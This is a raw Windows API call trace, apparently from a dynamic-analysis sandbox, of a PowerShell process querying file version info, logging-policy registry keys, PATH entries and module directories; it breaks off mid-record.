VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570cdc, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570d24, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570d94, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x0, puLen=0x4ebf148) returned 0 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x0, puLen=0x4ebf148) returned 0 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x0, puLen=0x4ebf148) returned 0 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x0, puLen=0x4ebf148) returned 0 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x4ebf140, puLen=0x4ebf13c | out: lplpBuffer=0x4ebf140*=0x5570df4, puLen=0x4ebf13c) returned 1 [0082.940] VerLanguageNameW (in: wLang=0x409, szLang=0x4ebeed0, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0082.941] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\", lplpBuffer=0x4ebf150, puLen=0x4ebf14c | out: lplpBuffer=0x4ebf150*=0x5570a7c, puLen=0x4ebf14c) returned 1 [0087.269] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebf258 | out: lpPerformanceCount=0x4ebf258*=1641008595207) returned 1 [0087.275] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebf194, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.346] EtwEventActivityIdControl () returned 0x0 [0087.346] EtwEventActivityIdControl () returned 0x0 [0087.346] EtwEventActivityIdControl () returned 0x0 [0087.400] EtwEventActivityIdControl () returned 0x0 [0087.400] EtwEventActivityIdControl () returned 0x0 [0087.400] EtwEventActivityIdControl () returned 0x0 [0087.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe99c, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe99c, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe988, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.463] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf204 | out: phkResult=0x4ebf204*=0x0) returned 0x2 [0087.463] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf204 | out: phkResult=0x4ebf204*=0x0) returned 0x2 [0087.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\EventLog\\ProtectedEventLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf178 | out: phkResult=0x4ebf178*=0x0) returned 0x2 [0087.467] EtwEventWriteTransfer () returned 0x0 [0087.467] EtwEventWriteTransfer () returned 0x0 [0087.469] EtwEventWriteTransfer () returned 0x0 [0087.472] EtwEventWriteTransfer () returned 0x0 [0087.473] EtwEventWriteTransfer () returned 0x0 [0087.475] EtwEventWriteTransfer () returned 0x0 [0087.475] EtwEventWriteTransfer () returned 0x0 [0087.478] EtwEventWriteTransfer () returned 0x0 [0087.479] EtwEventWriteTransfer () returned 0x0 [0087.482] EtwEventWriteTransfer () returned 0x0 [0087.483] EtwEventWriteTransfer () returned 0x0 [0087.485] EtwEventWriteTransfer () returned 0x0 [0087.486] EtwEventWriteTransfer () returned 0x0 [0087.488] EtwEventWriteTransfer () returned 0x0 [0087.489] EtwEventWriteTransfer () returned 0x0 [0087.490] EtwEventWriteTransfer () returned 0x0 [0087.492] EtwEventWriteTransfer () returned 0x0 [0087.493] EtwEventWriteTransfer () returned 0x0 [0087.495] EtwEventWriteTransfer () returned 0x0 [0087.496] EtwEventWriteTransfer () returned 0x0 [0087.498] EtwEventWriteTransfer () returned 0x0 [0087.499] EtwEventWriteTransfer () returned 0x0 [0087.501] EtwEventWriteTransfer () returned 0x0 [0087.502] EtwEventWriteTransfer () returned 0x0 [0087.504] EtwEventWriteTransfer () returned 0x0 [0087.505] EtwEventWriteTransfer () returned 0x0 [0087.507] EtwEventWriteTransfer () returned 0x0 [0087.508] EtwEventWriteTransfer () returned 0x0 [0087.509] EtwEventWriteTransfer () returned 0x0 [0087.511] EtwEventWriteTransfer () returned 0x0 [0087.512] EtwEventWriteTransfer () returned 0x0 [0087.514] EtwEventWriteTransfer () returned 0x0 [0087.515] EtwEventWriteTransfer () returned 0x0 [0087.517] EtwEventWriteTransfer () returned 0x0 [0087.518] EtwEventWriteTransfer () returned 0x0 [0087.520] EtwEventWriteTransfer () returned 0x0 [0087.521] EtwEventWriteTransfer () returned 0x0 [0087.522] EtwEventWriteTransfer () returned 0x0 [0087.523] EtwEventWriteTransfer () returned 0x0 [0087.525] EtwEventWriteTransfer () returned 0x0 [0087.607] EtwEventWriteTransfer () returned 0x0 [0087.608] EtwEventWriteTransfer () returned 0x0 [0087.608] EtwEventWriteTransfer () returned 0x0 [0087.609] EtwEventWriteTransfer () returned 0x0 [0087.609] EtwEventWriteTransfer () returned 0x0 [0087.610] EtwEventWriteTransfer () returned 0x0 [0087.610] EtwEventWriteTransfer () returned 0x0 [0087.611] EtwEventWriteTransfer () returned 0x0 [0087.612] EtwEventWriteTransfer () returned 0x0 [0087.613] EtwEventWriteTransfer () returned 0x0 [0087.613] EtwEventWriteTransfer () returned 0x0 [0087.614] EtwEventWriteTransfer () returned 0x0 [0087.614] EtwEventWriteTransfer () returned 0x0 [0087.615] EtwEventWriteTransfer () returned 0x0 [0087.616] EtwEventWriteTransfer () returned 0x0 [0087.617] EtwEventWriteTransfer () returned 0x0 [0087.617] EtwEventWriteTransfer () returned 0x0 [0087.618] EtwEventWriteTransfer () returned 0x0 [0087.618] EtwEventWriteTransfer () returned 0x0 [0087.619] EtwEventWriteTransfer () returned 0x0 [0087.620] EtwEventWriteTransfer () returned 0x0 [0087.621] EtwEventWriteTransfer () returned 0x0 [0087.621] EtwEventWriteTransfer () returned 0x0 [0087.622] EtwEventWriteTransfer () returned 0x0 [0087.622] EtwEventWriteTransfer () returned 0x0 [0087.623] EtwEventWriteTransfer () returned 0x0 [0087.624] EtwEventWriteTransfer () returned 0x0 [0087.625] EtwEventWriteTransfer () returned 0x0 [0087.625] EtwEventWriteTransfer () returned 0x0 [0087.626] EtwEventWriteTransfer () returned 0x0 [0087.627] EtwEventWriteTransfer () returned 0x0 [0087.628] EtwEventWriteTransfer () returned 0x0 [0087.628] EtwEventWriteTransfer () returned 0x0 [0087.629] EtwEventWriteTransfer () returned 0x0 [0087.629] EtwEventWriteTransfer () returned 0x0 [0087.630] EtwEventWriteTransfer () returned 0x0 [0087.631] EtwEventWriteTransfer () returned 0x0 [0087.632] EtwEventWriteTransfer () returned 0x0 [0087.632] EtwEventWriteTransfer () returned 0x0 [0087.634] EtwEventWriteTransfer () returned 0x0 [0087.635] EtwEventWriteTransfer () returned 0x0 [0087.637] EtwEventWriteTransfer () returned 0x0 [0087.638] EtwEventWriteTransfer () returned 0x0 [0087.641] EtwEventWriteTransfer () returned 0x0 [0087.641] EtwEventWriteTransfer () returned 0x0 [0087.643] EtwEventWriteTransfer () returned 0x0 [0087.644] EtwEventWriteTransfer () returned 0x0 [0087.646] EtwEventWriteTransfer () returned 0x0 [0087.647] EtwEventWriteTransfer () returned 0x0 [0087.648] EtwEventWriteTransfer () returned 0x0 [0087.650] EtwEventWriteTransfer () returned 0x0 [0087.651] EtwEventWriteTransfer () returned 0x0 [0087.652] EtwEventWriteTransfer () returned 0x0 [0087.654] EtwEventWriteTransfer () returned 0x0 [0087.655] EtwEventWriteTransfer () returned 0x0 [0087.656] EtwEventWriteTransfer () returned 0x0 [0087.657] EtwEventWriteTransfer () returned 0x0 [0087.659] EtwEventWriteTransfer () returned 0x0 [0087.659] EtwEventWriteTransfer () returned 0x0 [0087.661] EtwEventWriteTransfer () returned 0x0 [0087.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe958, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.675] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed98, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.676] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ebecb4, nSize=0x80 | out: lpBuffer="") returned 0xbc [0087.676] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ebec3c, nSize=0xbc | out: lpBuffer="") returned 0xbb [0087.677] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ebec28, nSize=0xbc | out: lpBuffer="") returned 0x3a [0087.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4265bc8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ebec30, nSize=0xbc | out: lpBuffer="") returned 0x3a [0087.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0087.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0087.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb20) returned 1 [0087.689] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x4ebede4 | out: lpFileInformation=0x4ebede4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24e171e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e171e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0087.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb1c) returned 1 [0087.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeddc) returned 1 [0087.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0087.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0087.691] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Add-Type.*", lpFindFileData=0x4ebeb8c | out: lpFindFileData=0x4ebeb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0087.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb34) returned 1 [0087.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebed94) returned 1 [0087.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe4c0, nSize=0xbc | out: lpBuffer="") returned 0x0 [0087.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0087.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0087.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb20) returned 1 [0087.694] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x4ebede4 | out: lpFileInformation=0x4ebede4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x856b8120, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0x856b8120, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0087.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb1c) returned 1 [0087.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeddc) returned 1 [0087.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0087.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0087.695] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Add-Type.*", lpFindFileData=0x4ebeb8c | out: lpFindFileData=0x4ebeb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0087.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb34) returned 1 [0087.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebed94) returned 1 [0087.695] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0087.695] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0087.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb20) returned 1 [0087.695] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x4ebede4 | out: lpFileInformation=0x4ebede4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7d2061a0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x7d2061a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0087.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb1c) returned 1 [0087.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeddc) returned 1 [0087.695] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0087.696] FindFirstFileW (in: lpFileName="C:\\Windows\\Add-Type.*", lpFindFileData=0x4ebeb8c | out: lpFindFileData=0x4ebeb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0087.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb34) returned 1 [0087.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebed94) returned 1 [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0087.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb20) returned 1 [0087.696] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x4ebede4 | out: lpFileInformation=0x4ebede4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc22608a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x24aab240, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24aab240, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0087.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb1c) returned 1 [0087.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeddc) returned 1 [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0087.697] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Add-Type.*", lpFindFileData=0x4ebeb8c | out: lpFindFileData=0x4ebeb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0087.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb34) returned 1 [0087.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebed94) returned 1 [0087.700] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x4ebec94, nSize=0xbc | out: lpBuffer="") returned 0x95 [0087.712] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\5alr3u30d3\\documents\\windowspowershell\\modules")) returned 0xffffffff [0087.721] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0087.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0087.724] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0087.724] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0087.724] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d3c0 [0087.725] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.725] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0087.725] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e3d340, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e3d340, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0087.725] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0087.725] FindClose (in: hFindFile=0x34d3c0 | out: hFindFile=0x34d3c0) returned 1 [0087.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0087.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0087.726] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0087.726] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0087.727] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0087.727] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0087.727] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0087.727] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0087.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0087.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0087.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0087.728] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0087.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0087.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0087.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0087.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0087.728] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e3d340, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e3d340, ftLastWriteTime.dwHighDateTime=0x1d706a5, 